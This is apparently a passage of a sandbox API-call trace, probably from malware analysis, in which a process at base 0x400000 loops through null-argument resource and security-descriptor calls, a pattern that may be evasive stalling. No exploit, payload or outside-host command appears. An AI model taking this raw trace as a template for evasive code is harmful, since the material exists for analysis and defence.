[0219.808] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.808] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.808] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.808] LockResource (hResData=0x0) returned 0x0 [0219.808] FreeResource (hResData=0x0) returned 0 [0219.808] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.808] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.808] LockResource (hResData=0x0) returned 0x0 [0219.808] FreeResource (hResData=0x0) returned 0 [0219.808] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.808] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.808] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.808] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.808] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.808] LockResource (hResData=0x0) returned 0x0 [0219.808] FreeResource (hResData=0x0) returned 0 [0219.808] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.808] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.809] LockResource (hResData=0x0) returned 0x0 [0219.809] FreeResource (hResData=0x0) returned 0 [0219.809] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.809] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.809] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.809] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.809] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.809] LockResource (hResData=0x0) returned 0x0 [0219.809] FreeResource (hResData=0x0) returned 0 [0219.809] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.809] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.809] LockResource (hResData=0x0) returned 0x0 [0219.809] FreeResource (hResData=0x0) returned 0 [0219.809] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.809] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.809] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.809] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.809] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.809] LockResource (hResData=0x0) returned 0x0 [0219.809] FreeResource (hResData=0x0) returned 0 [0219.809] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.809] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.809] LockResource (hResData=0x0) returned 0x0 [0219.809] FreeResource (hResData=0x0) returned 0 [0219.809] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.809] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.809] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.809] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.809] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.809] LockResource (hResData=0x0) returned 0x0 [0219.809] FreeResource (hResData=0x0) returned 0 [0219.809] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.809] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.809] LockResource (hResData=0x0) returned 0x0 [0219.810] FreeResource (hResData=0x0) returned 0 [0219.810] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.810] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.810] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.810] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.810] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.810] LockResource (hResData=0x0) returned 0x0 [0219.810] FreeResource (hResData=0x0) returned 0 [0219.810] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.810] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.810] LockResource (hResData=0x0) returned 0x0 [0219.810] FreeResource (hResData=0x0) returned 0 [0219.810] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.810] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.810] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.810] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.810] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.810] LockResource (hResData=0x0) returned 0x0 [0219.810] FreeResource (hResData=0x0) returned 0 [0219.810] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.810] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.810] LockResource (hResData=0x0) returned 0x0 [0219.810] FreeResource (hResData=0x0) returned 0 [0219.810] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.810] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.810] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.810] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.810] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.810] LockResource (hResData=0x0) returned 0x0 [0219.810] FreeResource (hResData=0x0) returned 0 [0219.810] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.810] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.810] LockResource (hResData=0x0) returned 0x0 [0219.810] FreeResource (hResData=0x0) returned 0 [0219.810] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.810] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.810] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.810] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.810] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.810] LockResource (hResData=0x0) returned 0x0 [0219.810] FreeResource (hResData=0x0) returned 0 [0219.810] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.810] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.810] LockResource (hResData=0x0) returned 0x0 [0219.810] FreeResource (hResData=0x0) returned 0 [0219.810] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.811] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.811] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.811] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.811] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.811] LockResource (hResData=0x0) returned 0x0 [0219.811] FreeResource (hResData=0x0) returned 0 [0219.811] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.811] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.811] LockResource (hResData=0x0) returned 0x0 [0219.811] FreeResource (hResData=0x0) returned 0 [0219.811] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.811] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.811] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.811] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.811] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.811] LockResource (hResData=0x0) returned 0x0 [0219.811] FreeResource (hResData=0x0) returned 0 [0219.811] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.811] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.811] LockResource (hResData=0x0) returned 0x0 [0219.811] FreeResource (hResData=0x0) returned 0 [0219.811] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.811] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.811] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.811] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.811] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.811] LockResource (hResData=0x0) returned 0x0 [0219.811] FreeResource (hResData=0x0) returned 0 [0219.811] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.811] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.811] LockResource (hResData=0x0) returned 0x0 [0219.811] FreeResource (hResData=0x0) returned 0 [0219.811] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.811] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.811] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.811] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.811] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.811] LockResource (hResData=0x0) returned 0x0 [0219.811] FreeResource (hResData=0x0) returned 0 [0219.811] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.811] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.811] LockResource (hResData=0x0) returned 0x0 [0219.811] FreeResource (hResData=0x0) returned 0 [0219.811] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.811] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.811] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.811] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.811] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.812] LockResource (hResData=0x0) returned 0x0 [0219.812] FreeResource (hResData=0x0) returned 0 [0219.812] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.812] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.812] LockResource (hResData=0x0) returned 0x0 [0219.812] FreeResource (hResData=0x0) returned 0 [0219.812] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.812] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.812] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.812] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.812] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.812] LockResource (hResData=0x0) returned 0x0 [0219.812] FreeResource (hResData=0x0) returned 0 [0219.812] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.812] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.812] LockResource (hResData=0x0) returned 0x0 [0219.812] FreeResource (hResData=0x0) returned 0 [0219.812] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.812] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.812] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.812] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.812] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.812] LockResource (hResData=0x0) returned 0x0 [0219.812] FreeResource (hResData=0x0) returned 0 [0219.812] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.812] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.812] LockResource (hResData=0x0) returned 0x0 [0219.812] FreeResource (hResData=0x0) returned 0 [0219.812] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.812] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.812] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.812] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.812] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.812] LockResource (hResData=0x0) returned 0x0 [0219.812] FreeResource (hResData=0x0) returned 0 [0219.812] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.812] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.812] LockResource (hResData=0x0) returned 0x0 [0219.812] FreeResource (hResData=0x0) returned 0 [0219.812] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.812] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.812] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.812] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.812] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.812] LockResource (hResData=0x0) returned 0x0 [0219.812] FreeResource (hResData=0x0) returned 0 [0219.812] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.812] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.812] LockResource (hResData=0x0) returned 0x0 [0219.813] FreeResource (hResData=0x0) returned 0 [0219.813] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.813] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.813] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.813] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.813] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.813] LockResource (hResData=0x0) returned 0x0 [0219.813] FreeResource (hResData=0x0) returned 0 [0219.813] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.813] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.813] LockResource (hResData=0x0) returned 0x0 [0219.813] FreeResource (hResData=0x0) returned 0 [0219.813] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.813] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.813] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.813] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.813] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.813] LockResource (hResData=0x0) returned 0x0 [0219.813] FreeResource (hResData=0x0) returned 0 [0219.813] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.813] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.813] LockResource (hResData=0x0) returned 0x0 [0219.813] FreeResource (hResData=0x0) returned 0 [0219.813] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.813] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.813] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.813] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.813] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.813] LockResource (hResData=0x0) returned 0x0 [0219.813] FreeResource (hResData=0x0) returned 0 [0219.813] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.813] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.813] LockResource (hResData=0x0) returned 0x0 [0219.813] FreeResource (hResData=0x0) returned 0 [0219.813] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.813] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.813] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.813] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.813] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.813] LockResource (hResData=0x0) returned 0x0 [0219.813] FreeResource (hResData=0x0) returned 0 [0219.813] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.813] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.813] LockResource (hResData=0x0) returned 0x0 [0219.813] FreeResource (hResData=0x0) returned 0 [0219.813] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.813] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.813] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.813] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.814] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.814] LockResource (hResData=0x0) returned 0x0 [0219.814] FreeResource (hResData=0x0) returned 0 [0219.814] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.814] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.814] LockResource (hResData=0x0) returned 0x0 [0219.814] FreeResource (hResData=0x0) returned 0 [0219.814] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.814] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.814] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.814] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.814] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.814] LockResource (hResData=0x0) returned 0x0 [0219.814] FreeResource (hResData=0x0) returned 0 [0219.814] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.814] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.814] LockResource (hResData=0x0) returned 0x0 [0219.814] FreeResource (hResData=0x0) returned 0 [0219.814] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.814] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.814] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.814] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.814] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.814] LockResource (hResData=0x0) returned 0x0 [0219.814] FreeResource (hResData=0x0) returned 0 [0219.814] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.814] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.814] LockResource (hResData=0x0) returned 0x0 [0219.814] FreeResource (hResData=0x0) returned 0 [0219.814] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.814] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.814] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.814] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.814] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.814] LockResource (hResData=0x0) returned 0x0 [0219.814] FreeResource (hResData=0x0) returned 0 [0219.814] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.814] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.814] LockResource (hResData=0x0) returned 0x0 [0219.814] FreeResource (hResData=0x0) returned 0 [0219.814] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.814] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.814] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.815] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.815] LoadResource 